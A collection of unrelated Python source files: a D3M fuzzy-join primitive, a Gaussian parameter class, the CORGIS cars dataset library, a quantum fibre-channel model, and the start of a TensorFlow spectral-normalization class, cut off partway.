new_left_cols += list(new_left_df.columns)
new_right_cols += list(new_right_df.columns)
right_cols_to_drop.append(right_col[col_index])
elif len(self._DATETIME_JOIN_TYPES.intersection(join_types[col_index])) > 0:
tolerance = self._compute_datetime_tolerance(left_df_full, left_col[col_index], right_df, right_col[col_index], accuracy[col_index])
new_left_df, new_right_df = self._create_datetime_merge_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
tolerance,
col_index,
)
left_df[new_left_df.columns] = new_left_df
right_df[new_right_df.columns] = new_right_df
new_left_cols += list(new_left_df.columns)
new_right_cols += list(new_right_df.columns)
right_cols_to_drop.append(right_col[col_index])
else:
raise exceptions.InvalidArgumentValueError(
"join not surpported on type " + str(join_types[col_index])
)
if "d3mIndex" in right_df.columns:
right_cols_to_drop.append("d3mIndex")
right_df.drop(columns=right_cols_to_drop, inplace=True)
joined = pd.merge(
left_df,
right_df,
how=self.hyperparams["join_type"],
left_on=new_left_cols,
right_on=new_right_cols,
suffixes=["_left", "_right"],
)
# don't want to keep columns that were created specifically for merging
# also, inner merge keeps the right column we merge on, we want to remove it
joined.drop(columns=new_left_cols + new_right_cols, inplace=True)
return joined
def multi_produce(
self,
*,
produce_methods: typing.Sequence[str],
left: Inputs,
right: Inputs, # type: ignore
timeout: float = None,
iterations: int = None,
) -> base.MultiCallResult: # type: ignore
return self._multi_produce(
produce_methods=produce_methods,
timeout=timeout,
iterations=iterations,
left=left,
right=right,
)
def fit_multi_produce(
self,
*,
produce_methods: typing.Sequence[str],
left: Inputs,
right: Inputs, # type: ignore
timeout: float = None,
iterations: int = None,
) -> base.MultiCallResult: # type: ignore
return self._fit_multi_produce(
produce_methods=produce_methods,
timeout=timeout,
iterations=iterations,
left=left,
right=right,
)
@classmethod
def _get_join_semantic_type(
cls,
left: container.Dataset,
left_resource_id: str,
left_col: str,
right: container.Dataset,
right_resource_id: str,
right_col: str,
) -> typing.Sequence[str]:
# get semantic types for left and right cols
left_types = cls._get_column_semantic_type(left, left_resource_id, left_col)
right_types = cls._get_column_semantic_type(right, right_resource_id, right_col)
# extract supported types
supported_left_types = left_types.intersection(cls._SUPPORTED_TYPES)
supported_right_types = right_types.intersection(cls._SUPPORTED_TYPES)
# check for exact match
join_types = list(supported_left_types.intersection(supported_right_types))
if len(join_types) == 0:
if (
len(left_types.intersection(cls._NUMERIC_JOIN_TYPES)) > 0
and len(right_types.intersection(cls._NUMERIC_JOIN_TYPES)) > 0
):
# no exact match, but FLOAT and INT are allowed to join
join_types = ["http://schema.org/Float"]
elif (
len(left_types.intersection(cls._STRING_JOIN_TYPES)) > 0
and len(right_types.intersection(cls._STRING_JOIN_TYPES)) > 0
):
# no exact match, but any text-based type is allowed to join
join_types = ["http://schema.org/Text"]
return join_types
@classmethod
def _get_column_semantic_type(
cls, dataset: container.Dataset, resource_id: str, col_name: str
) -> typing.Set[str]:
for col_idx in range(
dataset.metadata.query((resource_id, metadata_base.ALL_ELEMENTS))[
"dimension"
]["length"]
):
col_metadata = dataset.metadata.query(
(resource_id, metadata_base.ALL_ELEMENTS, col_idx)
)
if col_metadata.get("name", "") == col_name:
return set(col_metadata.get("semantic_types", ()))
return set()
@classmethod
def _string_fuzzy_match(
cls, match: typing.Any, choices: typing.Sequence[typing.Any], min_score: float
) -> typing.Optional[str]:
choice, score, index = process.extractOne(match, choices)
val = None
if score >= min_score:
val = choice
return val
@classmethod
def _create_string_merge_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float,
index: int,
) -> pd.DataFrame:
if accuracy < 1:
left_keys = left_df[left_col].unique()
right_keys = right_df[right_col].unique()
matches: typing.Dict[str, typing.Optional[str]] = {}
for left_key in left_keys:
matches[left_key] = cls._string_fuzzy_match(
left_key, right_keys, accuracy * 100
)
new_left_df = container.DataFrame(
{
"lefty_string"
+ str(index): left_df[left_col].map(lambda key: matches[key])
}
)
else:
new_left_df = container.DataFrame(
{"lefty_string" + str(index): left_df[left_col]}
)
return new_left_df
def _numeric_fuzzy_match(match, choices, accuracy, is_absolute):
# not sure if this is faster than applying a lambda against the sequence - probably is
min_distance = float("inf")
min_val = float("nan")
if is_absolute:
tolerance = accuracy
else:
inv_accuracy = 1.0 - accuracy
tolerance = float(match) * inv_accuracy
for i, num in enumerate(choices):
distance = abs(match - num)
if distance <= tolerance and distance <= min_distance:
min_val = num
min_distance = distance
return min_val
def _geo_fuzzy_match(match, choices, col, accuracy, is_absolute):
# assume the accuracy is meters
if not is_absolute:
raise exceptions.InvalidArgumentTypeError(
"geo fuzzy match requires an absolute accuracy parameter that specifies the tolerance in meters"
)
# keep the set of choices that falls within the acceptable distance
return choices[choices[col].map(lambda x: hs.haversine(match, x, Unit.METERS)) < accuracy]
@classmethod
def _create_numeric_merge_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float,
index: int,
is_absolute: bool,
) -> pd.DataFrame:
choices = right_df[right_col].unique()
new_left_df = container.DataFrame(
{
"lefty_numeric"
+ str(index): pd.to_numeric(left_df[left_col]).map(
lambda x: cls._numeric_fuzzy_match(
x, choices, accuracy, is_absolute
)
)
}
)
return new_left_df
@classmethod
def _create_geo_vector_merging_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float,
index: int,
is_absolute: bool,
) -> pd.DataFrame:
def fromstring(x: str) -> np.ndarray:
return np.fromstring(x, dtype=float, sep=",")
def topoints(x: np.ndarray) -> typing.Sequence[typing.Sequence[float]]:
# create a sequence of points by joining two successive values
it = iter(x)
return list(zip(it, it))
if type(left_df[left_col].iloc[0]) == str:
left_vector_length = np.fromstring(
left_df[left_col].iloc[0], dtype=float, sep=","
).shape[0]
new_left_cols = [
"lefty_vector" + str(index) + "_" + str(i)
for i in range(int(left_vector_length/2))
]
new_left_df = container.DataFrame(
left_df[left_col]
.apply(fromstring, convert_dtype=False)
.apply(topoints)
.values.tolist(),
columns=new_left_cols,
)
else:
left_vector_length = left_df[left_col].iloc[0].shape[0]
new_left_cols = [
"lefty_vector" + str(index) + "_" + str(i)
for i in range(int(left_vector_length/2))
]
new_left_df = container.DataFrame(
left_df[left_col].apply(topoints).values.tolist(),
columns=new_left_cols,
)
if type(right_df[right_col].iloc[0]) == str:
right_vector_length = np.fromstring(
right_df[right_col].iloc[0], dtype=float, sep=","
).shape[0]
new_right_cols = [
"righty_vector" + str(index) + "_" + str(i)
for i in range(int(right_vector_length/2))
]
new_right_df = container.DataFrame(
right_df[right_col]
.apply(fromstring, convert_dtype=False)
.apply(topoints)
.values.tolist(),
columns=new_right_cols,
)
else:
right_vector_length = right_df[right_col].iloc[0].shape[0]
new_right_cols = [
"righty_vector" + str(index) + "_" + str(i)
for i in range(int(right_vector_length/2))
]
new_right_df = container.DataFrame(
right_df[right_col].apply(topoints).values.tolist(),
columns=new_right_cols,
)
# get a unique name to hold the possible matches
base_name = 'righty_lefty'
unique_name = base_name
count = 1
while unique_name in new_left_df.columns:
unique_name = base_name + f'_{count}'
count = count + 1
# get an initial set of possible matches (should usually be a very small subset)
new_left_df[unique_name] = pd.Series([cls._geo_fuzzy_match(
p,
new_right_df,
new_right_cols[0],
accuracy,
is_absolute
) for p in new_left_df[new_left_cols[0]]])
# process the remaining vector values to narrow down the set of matches
# this couldve all been done in a single loop but this keep it slightly cleaner
for i in range(1, len(new_left_cols)):
new_left_df[unique_name] = pd.Series([cls._geo_fuzzy_match(
p,
f,
new_right_cols[i],
accuracy,
is_absolute
) for (p, f) in zip(new_left_df[new_left_cols[i]], new_left_df[unique_name])])
# reduce the set of matches to either the first match or an empty set
# NOTE: THIS IS NOT THE BEST WAY
# FOR JOINS, EITHER ALL MATCHES SHOULD BE KEPT OR ONLY THE CLOSEST MATCH SHOULD BE KEPT
# THE PREVIOUS IMPLEMENTATION WAS EVEN WORSE AS IT ONLY KEPT THE NEAREST MATCH AT ANY GIVEN POINT
# SO IF ONE POLYGON WAS NOT NEAREST AT EVERY POINT, THEN NO MATCH WAS MADE
tmp_df_left = pd.concat(new_left_df[unique_name].map(lambda x: x.head(1) if len(x) > 0 else pd.DataFrame([[None] * len(new_right_cols)], columns=new_right_cols)).tolist(), ignore_index=True)
new_left_df[new_left_cols] = tmp_df_left[new_right_cols]
new_left_df.drop(columns=[unique_name], inplace=True)
return (new_left_df, new_right_df)
@classmethod
def _create_vector_merging_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float,
index: int,
is_absolute: bool,
) -> pd.DataFrame:
def fromstring(x: str) -> np.ndarray:
return np.fromstring(x, dtype=float, sep=",")
if type(left_df[left_col].iloc[0]) == str:
left_vector_length = np.fromstring(
left_df[left_col].iloc[0], dtype=float, sep=","
).shape[0]
new_left_cols = [
"lefty_vector" + str(index) + "_" + str(i)
for i in range(left_vector_length)
]
new_left_df = container.DataFrame(
left_df[left_col]
.apply(fromstring, convert_dtype=False)
.values.tolist(),
columns=new_left_cols,
)
else:
left_vector_length = left_df[left_col].iloc[0].shape[0]
new_left_cols = [
"lefty_vector" + str(index) + "_" + str(i)
for i in range(left_vector_length)
]
new_left_df = container.DataFrame(
left_df[left_col].values.tolist(),
columns=new_left_cols,
)
if type(right_df[right_col].iloc[0]) == str:
right_vector_length = np.fromstring(
right_df[right_col].iloc[0], dtype=float, sep=","
).shape[0]
new_right_cols = [
"righty_vector" + str(index) + "_" + str(i)
for i in range(right_vector_length)
]
new_right_df = container.DataFrame(
right_df[right_col]
.apply(fromstring, convert_dtype=False)
.values.tolist(),
columns=new_right_cols,
)
else:
right_vector_length = right_df[right_col].iloc[0].shape[0]
new_right_cols = [
"righty_vector" + str(index) + "_" + str(i)
for i in range(right_vector_length)
]
new_right_df = container.DataFrame(
right_df[right_col].values.tolist(),
columns=new_right_cols,
)
for i in range(len(new_left_cols)):
new_left_df[new_left_cols[i]] = new_left_df[new_left_cols[i]].map(
lambda x: cls._numeric_fuzzy_match(
x,
new_right_df[new_right_cols[i]],
accuracy,
is_absolute,
)
)
return (new_left_df, new_right_df)
@classmethod
def _create_datetime_merge_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
tolerance: float,
index: int,
) -> pd.DataFrame:
# use d3mIndex from left col if present
# compute a tolerance delta for time matching based on a percentage of the minimum left/right time
# range
left_name = "lefty_datetime" + str(index)
right_name = "righty_datetime" + str(index)
new_right_df = container.DataFrame(
{
right_name: np.array(
[np.datetime64(parser.parse(dt)) for dt in right_df[right_col]]
)
}
)
choices = np.unique(new_right_df[right_name])
left_keys = np.array(
[np.datetime64(parser.parse(dt)) for dt in left_df[left_col].values]
)
new_left_df = container.DataFrame(
{
left_name: np.array(
[
cls._datetime_fuzzy_match(dt, choices, tolerance)
for dt in left_keys
]
)
}
)
return new_left_df, new_right_df
@classmethod
def _datetime_fuzzy_match(
cls,
match: np.datetime64,
choices: typing.Sequence[np.datetime64],
tolerance: np.timedelta64,
) -> typing.Optional[np.datetime64]:
min_distance = None
min_date = None
for i, date in enumerate(choices):
distance = abs(match - date)
if distance <= tolerance and (
min_distance is None or distance < min_distance
):
min_distance = distance
min_date = date
# default empty match to NaT to make it valid for datetime typing
if min_date is None:
min_date = pd.NaT
return min_date
@classmethod
def _compute_time_range(
cls, left: typing.Sequence[np.datetime64], right: typing.Sequence[np.datetime64]
) -> float:
left_min = np.amin(left)
left_max = np.amax(left)
left_delta = left_max - left_min
right_min = np.amin(right)
right_max = np.amax(right)
right_delta = right_max - right_min
return min(left_delta, right_delta)
@classmethod
def _compute_datetime_tolerance(cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float
) -> typing.Dict[str, float]:
new_right_df = np.array(
[np.datetime64(parser.parse(dt)) for dt in right_df[right_col]]
)
choices = np.unique(new_right_df)
left_keys = np.array(
[np.datetime64(parser.parse(dt)) for dt in left_df[left_col].values]
)
return (1.0 - accuracy) * cls._compute_time_range(left_keys, choices)
|
# python3
# -*- coding: utf-8 -*-
# @Author : lina
# @Time : 2018/5/3 14:38
"""
distribution of gaussian
"""
class Gaussian():
mu1 = 0 # double type, mean value of matched pairs
mu2 = 0 # double type, mean value of unmatched pairs
sigma1 = 0 # double type, variance of matched pairs, 方差
sigma2 = 0 # double type, variance of unmatched pairs, 方差
def __init__(self, mu1, mu2, sigma1, sigma2):
self.mu1 = mu1
self.mu2 = mu2
self.sigma1 = sigma1
self.sigma2 = sigma2
def set_mu_and_sigma(self, mu1, mu2, sigma1, sigma2):
self.mu1 = mu1
self.mu2 = mu2
self.sigma1 = sigma1
self.sigma2 = sigma2
def set_mu1(self, mu1):
self.mu1 = mu1
def set_mu2(self, mu2):
self.mu2 = mu2
def set_sigma1(self, sigma1):
self.sigma1 = sigma1
def set_sigma2(self, sigma2):
self.sigma2 = sigma2
def get_mu1(self):
return self.mu1
def get_mu2(self):
return self.mu2
def get_sigma1(self):
return self.sigma1
def get_sigma2(self):
return self.sigma2
def to_string(self):
print("mu1: ", self.mu1, " mu2: ", self.mu2, " sigma1: ", self.sigma1, " sigma2: ", self.sigma2)
|
'''
Hello student. Thank you for downloading a CORGIS library. However, you do not need to open this library. Instead you should use the following:
import cars
If you opened the file because you are curious how this library works, then well done! We hope that you find it a useful learning experience. However, you should know that this code is meant to solve somewhat esoteric pedagogical problems, so it is often not best practices.
'''
import sys as _sys
import os as _os
import json as _json
import sqlite3 as _sql
import difflib as _difflib
class _Constants(object):
'''
Global singleton object to hide some of the constants; some IDEs reveal internal module details very aggressively, and there's no other way to hide stuff.
'''
_HEADER = {'User-Agent':
'CORGIS Cars library for educational purposes'}
_PYTHON_3 = _sys.version_info >= (3, 0)
_TEST = False
_HARDWARE = 1000
if _Constants._PYTHON_3:
import urllib.request as _request
from urllib.parse import quote_plus as _quote_plus
from urllib.error import HTTPError as _HTTPError
else:
import urllib2 as _urllib2
from urllib import quote_plus as _quote_plus
from urllib2 import HTTPError as _HTTPError
class DatasetException(Exception):
''' Thrown when there is an error loading the dataset for some reason.'''
pass
_Constants._DATABASE_NAME = "cars.db"
if not _os.access(_Constants._DATABASE_NAME, _os.F_OK):
raise DatasetException("Error! Could not find a \"{0}\" file. Make sure that there is a \"{0}\" in the same directory as \"{1}.py\"! Spelling is very important here.".format(_Constants._DATABASE_NAME, __name__))
elif not _os.access(_Constants._DATABASE_NAME, _os.R_OK):
raise DatasetException("Error! Could not read the \"{0}\" file. Make sure that it readable by changing its permissions. You may need to get help from your instructor.".format(_Constants._DATABASE_NAME, __name__))
elif not _os.access(_Constants._DATABASE_NAME, _os.W_OK):
_sys.stderr.write('The local cache (\" \") will not be updated. Make sure that it is writable by changing its permissions. You may need to get help from your instructor.\n'.format(_Constants._DATABASE_NAME))
_sys.stderr.flush()
_Constants._DATABASE = _sql.connect(_Constants._DATABASE_NAME)
class _Auxiliary(object):
@staticmethod
def _parse_type(value, type_func):
"""
Attempt to cast *value* into *type_func*, returning *default* if it fails.
"""
default = type_func(0)
if value is None:
return default
try:
return type_func(value)
except ValueError:
return default
@staticmethod
def _byteify(input):
"""
Force the given input to only use `str` instead of `bytes` or `unicode`.
This works even if the input is a dict, list,
"""
if isinstance(input, dict):
return {_Auxiliary._byteify(key): _Auxiliary._byteify(value) for key, value in input.items()}
elif isinstance(input, list):
return [_Auxiliary._byteify(element) for element in input]
elif _Constants._PYTHON_3 and isinstance(input, str):
return str(input.encode('ascii', 'replace').decode('ascii'))
elif not _Constants._PYTHON_3 and isinstance(input, unicode):
return str(input.encode('ascii', 'replace').decode('ascii'))
else:
return input
@staticmethod
def _guess_schema(input):
if isinstance(input, dict):
return {str(key.encode('ascii', 'replace').decode('ascii')):
_Auxiliary._guess_schema(value) for key, value in input.items()}
elif isinstance(input, list):
return [_Auxiliary._guess_schema(input[0])] if input else []
else:
return type(input)
################################################################################
# Domain Objects
################################################################################
################################################################################
# Interfaces
################################################################################
def get_cars(test=True):
"""
Returns the complete list of cars.
"""
if _Constants._TEST or test:
rows = _Constants._DATABASE.execute("SELECT data FROM cars LIMIT {hardware}".format(
hardware=_Constants._HARDWARE))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
else:
rows = _Constants._DATABASE.execute("SELECT data FROM cars".format(
hardware=_Constants._HARDWARE))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
def get_cars_by_year(year, test=True):
"""
Returns all the cars for a given year.
:param year: The year as an integer, between 1921 and 2013.
:type year: int
"""
if _Constants._TEST or test:
rows = _Constants._DATABASE.execute("SELECT data FROM cars WHERE year=? LIMIT {hardware}".format(
hardware=_Constants._HARDWARE),
(year, ))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
else:
rows = _Constants._DATABASE.execute("SELECT data FROM cars WHERE year=?".format(
hardware=_Constants._HARDWARE),
(year, ))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
def get_cars_by_make(make, test=True):
"""
Returns all the cars of a certain make.
:param make: The make of the cars
:type make: str
"""
# Match it against recommend values
potentials = [r[0].lower() for r in _Constants._DATABASE.execute("SELECT DISTINCT make FROM cars").fetchall()]
if make.lower() not in potentials:
best_guesses = _difflib.get_close_matches(make, potentials)
if best_guesses:
raise DatasetException("Error, the given identifier could not be found. Perhaps you meant one of:\n\t{}".format('\n\t'.join(map('"{}"'.format, best_guesses))))
else:
raise DatasetException("Error, the given identifier could not be found. Please check to make sure you have the right spelling.")
if _Constants._TEST or test:
rows = _Constants._DATABASE.execute("SELECT data FROM cars WHERE make=? COLLATE NOCASE LIMIT {hardware}".format(
hardware=_Constants._HARDWARE),
(make, ))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
else:
rows = _Constants._DATABASE.execute("SELECT data FROM cars WHERE make=? COLLATE NOCASE".format(
hardware=_Constants._HARDWARE),
(make, ))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
################################################################################
# Internalized testing code
################################################################################
def _test_interfaces():
from pprint import pprint as _pprint
from timeit import default_timer as _default_timer
# Production test
print("Production get_cars")
start_time = _default_timer()
result = get_cars(test=False)
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Test test
print("Test get_cars")
start_time = _default_timer()
result = get_cars()
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Production test
print("Production get_cars_by_year")
start_time = _default_timer()
result = get_cars_by_year("2001", test=False)
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Test test
print("Test get_cars_by_year")
start_time = _default_timer()
result = get_cars_by_year("2001")
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Production test
print("Production get_cars_by_make")
start_time = _default_timer()
result = get_cars_by_make("'Pontiac'", test=False)
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Test test
print("Test get_cars_by_make")
start_time = _default_timer()
result = get_cars_by_make("'Pontiac'")
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
if __name__ == '__main__':
from optparse import OptionParser as _OptionParser
_parser = _OptionParser()
_parser.add_option("-t", "--test", action="store_true",
default=False,
help="Execute the interfaces to test them.")
_parser.add_option("-r", "--reset", action="store_true",
default=False,
help="Reset the cache")
(_options, _args) = _parser.parse_args()
if _options.test:
_test_interfaces()
if _options.reset:
_modify_self()
|
import random
class Fibre(object):
"""
TODO: Add docstring
"""
def __init__(self, length=0.0, alpha=0.0):
if not isinstance(length, int) and not isinstance(length, float):
raise ValueError("Length must be float or int")
elif length < 0:
raise ValueError("Length must be non-negative")
else:
self._length = length
if not isinstance(alpha, int) and not isinstance(alpha, float):
raise ValueError("Alpha must be float or int")
elif alpha < 0 or alpha > 1:
raise ValueError("Alpha must lie in the interval [0, 1]")
else:
self._alpha = alpha
@property
def length(self):
"""
Length of the channel in m
Returns:
(float) : Length of the channel in m
"""
return self._length
@length.setter
def length(self, length):
"""
Set the length of the channel
Args:
length (float) : Length of the channel in m
"""
if not isinstance(length, int) and not isinstance(length, float):
raise ValueError("Length must be float or int")
elif length < 0:
raise ValueError("Length must be non-negative")
else:
self._length = length
@property
def alpha(self):
"""
Absorption coefficient of the channel in dB/m
Returns:
(float) : Absorption coefficient of the channel in dB/m
"""
return self._alpha
@alpha.setter
def alpha(self, alpha):
"""
Set the absorption coefficient of the channel
Args:
alpha (float) : Absorption coefficient of the channel in dB/m
"""
if not isinstance(alpha, int) and not isinstance(alpha, float):
raise ValueError("Alpha must be float or int")
elif alpha < 0 or alpha > 1:
raise ValueError("Alpha must lie in the interval [0, 1]")
else:
self._alpha = alpha
@property
def transmission_p(self):
"""
Transmission probability of the channel
Returns:
(float) : Probability that a qubit is transmitted
"""
return 10.0 ** (-1.0 * self._alpha * self._length / 10.0)
def qubit_func(self, qubit):
"""
Function to modify the qubit based on channel properties
In this case - Returns None if transmission fails or the original qubit if transmission succeeds
Required in all channel models
Returns
(object) : Modified qubit
"""
if random.random() > self.transmission_p:
if qubit is not None:
qubit.release()
return None
else:
return qubit
|
import warnings
import numpy as np
import tensorflow as tf
from GeneralTools.misc_fun import FLAGS
class SpectralNorm(object):
def __init__(self, sn_def, name_scope='SN', scope_prefix='', num_iter=1):
""" This class contains functions to calculate the spectral normalization of the weight matrix
using power iteration.
The application of spectral normal to NN is proposed in following papers:
Yoshida, Y., & Miyato, T. (2017).
Spectral Norm Regularization for Improving the Generalizability of Deep Learning.
Miyato, T., Kataoka, T., Koyama, M., & Yoshida, Y. (2017).
Spectral Normalization for Generative Adversarial Networks,
Here spectral normalization is generalized for any linear ops or combination of linear ops
Example of usage:
Example 1.
w = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
sn_def = {'op': 'tc', 'input_shape': [10, 64, 64, 64],
'output_shape': [10, 128, 64, 64],
'strides': 1, 'dilation': 1, 'padding': 'SAME',
'data_format': 'NCHW'}
sigma = SpectralNorm(sn_def, name_scope='SN1', num_iter=20).apply(w)
Example 2.
w = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
w2 = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
sn_def = {'op': 'tc', 'input_shape': [10, 64, 64, 64],
'output_shape': [10, 128, 64, 64],
'strides': 1, 'dilation': 1, 'padding': 'SAME',
'data_format': 'NCHW'}
SN = SpectralNorm(sn_def, num_iter=20)
sigma1 = SN.apply(w)
sigma2 = SN.apply(w2, name_scope='SN2', num_iter=30)
:param sn_def: a dictionary with keys depending on the type of kernel:
type keys value options
dense: 'op' 'd' - common dense layer; 'cd' - conditional dense layers;
'dcd' - dense + conditional dense; 'dck' - dense * conditional scale
'project' - same to cd, except num_out is 1
conv: 'op' 'c' - convolution; 'tc' - transpose convolution;
'cck' - convolution * conditional scale; 'tcck' - t-conv * conditional scale
'strides' integer
'dilation' integer
'padding' 'SAME' or 'VALID'
'data_format' 'NCHW' or 'NHWC'
'input_shape' list of integers in format NCHW or NHWC
'output_shape' for 'tc', output shape must be provided
:param name_scope:
:param scope_prefix:
:param num_iter: number of power iterations per run
"""
self.sn_def = sn_def.copy()
self.name_scope = name_scope
self.scope_prefix = scope_prefix
self.name_in_err = self.scope_prefix + self.name_scope
self.num_iter = num_iter
# initialize
self.w = None
self.x = None
self.use_u = None
self.is_initialized = False
self.forward = None
self.backward = None
# format stride
if self.sn_def['op'] in {'c', 'tc', 'cck', 'tcck'}:
if self.sn_def['data_format'] in ['NCHW', 'channels_first']:
self.sn_def['strides'] = (1, 1, self.sn_def['strides'], self.sn_def['strides'])
else:
self.sn_def['strides'] = (1, self.sn_def['strides'], self.sn_def['strides'], 1)
assert 'output_shape' in self.sn_def, \
'{}: for conv, output_shape must be provided.'.format(self.name_in_err)
def _init_routine(self):
""" This function decides the routine to minimize memory usage
:return:
"""
if self.is_initialized is False:
# decide the routine
if self.sn_def['op'] in {'d', 'project'}:
# for d kernel_shape [num_in, num_out]; for project, kernel shape [num_class, num_in]
assert len(self.kernel_shape) == 2, \
'{}: kernel shape {} does not have length 2'.format(self.name_in_err, self.kernel_shape)
num_in, num_out = self.kernel_shape
# self.use_u = True
self.use_u = True if num_in <= num_out else False
x_shape = [1, num_in] if self.use_u else [1, num_out]
self.forward = self._dense_ if self.use_u else self._dense_t_
self.backward = self._dense_t_ if self.use_u else self._dense_
elif self.sn_def['op'] in {'cd'}: # kernel_shape [num_class, num_in, num_out]
assert len(self.kernel_shape) == 3, \
'{}: kernel shape {} does not have length 3'.format(self.name_in_err, self.kernel_shape)
num_class, num_in, num_out = self.kernel_shape
self.use_u = True if num_in <= num_out else False
x_shape = [num_class, 1, num_in] if self.use_u else [num_class, 1, num_out]
self.forward = self._dense_ if self.use_u else self._dense_t_
self.backward = self._dense_t_ if self.use_u else self._dense_
elif self.sn_def['op'] in {'dck'}: # convolution * conditional scale
assert isinstance(self.kernel_shape, (list, tuple)) and len(self.kernel_shape) == 2, \
'{}: kernel shape must be a list of length 2. Got {}'.format(self.name_in_err, self.kernel_shape)
assert len(self.kernel_shape[0]) == 2 and len(self.kernel_shape[1]) == 2, \
'{}: kernel shape {} does not have length 2'.format(self.name_in_err, self.kernel_shape)
num_in, num_out = self.kernel_shape[0]
num_class = self.kernel_shape[1][0]
self.use_u = True if num_in <= num_out else False
x_shape = [num_class, num_in] if self.use_u else [num_class, num_out]
self.forward = (lambda x: self._scalar_(self._dense_(x, index=0), index=1, offset=1.0)) \
if self.use_u else (lambda y: self._dense_t_(self._scalar_(y, index=1, offset=1.0), index=0))
self.backward = (lambda y: self._dense_t_(self._scalar_(y, index=1, offset=1.0), index=0)) \
if self.use_u else (lambda x: self._scalar_(self._dense_(x, index=0), index=1, offset=1.0))
elif self.sn_def['op'] in {'c', 'tc'}:
assert len(self.kernel_shape) == 4, \
'{}: kernel shape {} does not have length 4'.format(self.name_in_err, self.kernel_shape)
# self.use_u = True
self.use_u = True \
if np.prod(self.sn_def['input_shape'][1:]) <= np.prod(self.sn_def['output_shape'][1:]) \
else False
if self.sn_def['op'] in {'c'}: # input / output shape NCHW or NHWC
x_shape = self.sn_def['input_shape'].copy() if self.use_u else self.sn_def['output_shape'].copy()
x_shape[0] = 1
y_shape = self.sn_def['input_shape'].copy()
y_shape[0] = 1
elif self.sn_def['op'] in {'tc'}: # tc
x_shape = self.sn_def['output_shape'].copy() if self.use_u else self.sn_def['input_shape'].copy()
x_shape[0] = 1
y_shape = self.sn_def['output_shape'].copy()
y_shape[0] = 1
else:
raise NotImplementedError('{}: {} not implemented.'.format(self.name_in_err, self.sn_def['op']))
self.forward = self._conv_ if self.use_u else (lambda y: self._conv_t_(y, x_shape=y_shape))
self.backward = (lambda y: self._conv_t_(y, x_shape=y_shape)) if self.use_u else self._conv_
elif self.sn_def['op'] in {'cck', 'tcck'}: # convolution * conditional scale
assert isinstance(self.kernel_shape, (list, tuple)) and len(self.kernel_shape) == 2, \
'{}: kernel shape must be a list of length 2. Got {}'.format(self.name_in_err, self.kernel_shape)
assert len(self.kernel_shape[0]) == 4 and len(self.kernel_shape[1]) == 4, \
'{}: kernel shape {} does not have length 4'.format(self.name_in_err, self.kernel_shape)
self.use_u = True \
if np.prod(self.sn_def['input_shape'][1:]) <= np.prod(self.sn_def['output_shape'][1:]) \
else False
num_class = self.kernel_shape[1][0]
if self.sn_def['op'] in {'cck'}: # input / output shape NCHW or NHWC
x_shape = self.sn_def['input_shape'].copy() if self.use_u else self.sn_def['output_shape'].copy()
x_shape[0] = num_class
y_shape = self.sn_def['input_shape'].copy()
y_shape[0] = num_class
self.forward = (lambda x: self._scalar_(self._conv_(x, index=0), index=1, offset=1.0)) \
if self.use_u \
else (lambda y: self._conv_t_(self._scalar_(y, index=1, offset=1.0), x_shape=y_shape, index=0))
self.backward = (lambda y: self._conv_t_(
self._scalar_(y, index=1, offset=1.0), x_shape=y_shape, index=0)) \
if self.use_u else (lambda x: self._scalar_(self._conv_(x, index=0), index=1, offset=1.0))
elif self.sn_def['op'] in {'tcck'}: # tcck
x_shape = self.sn_def['output_shape'].copy() if self.use_u else self.sn_def['input_shape'].copy()
x_shape[0] = num_class
y_shape = self.sn_def['output_shape'].copy()
y_shape[0] = num_class
self.forward = (lambda x: self._conv_(self._scalar_(x, index=1, offset=1.0), index=0)) \
if self.use_u \
else (lambda y: self._scalar_(self._conv_t_(y, x_shape=y_shape, index=0), index=1, offset=1.0))
self.backward = (lambda y: self._scalar_(
self._conv_t_(y, x_shape=y_shape, index=0), index=1, offset=1.0)) \
if self.use_u else (lambda x: self._conv_(self._scalar_(x, index=1, offset=1.0), index=0))
else:
raise NotImplementedError('{}: {} not implemented.'.format(self.name_in_err, self.sn_def['op']))
else:
raise NotImplementedError('{}: {} is not implemented.'.format(self.name_in_err, self.sn_def['op']))
self.x = tf.compat.v1.get_variable(
'in_rand', shape=x_shape, dtype=tf.float32,
initializer=tf.truncated_normal_initializer(), trainable=False)
self.is_initialized = True
def _scalar_(self, x, index=None, offset=0.0):
""" This function defines a elementwise multiplication op: y = x * w, where x shape [N, C, ...] or [N, ..., C],
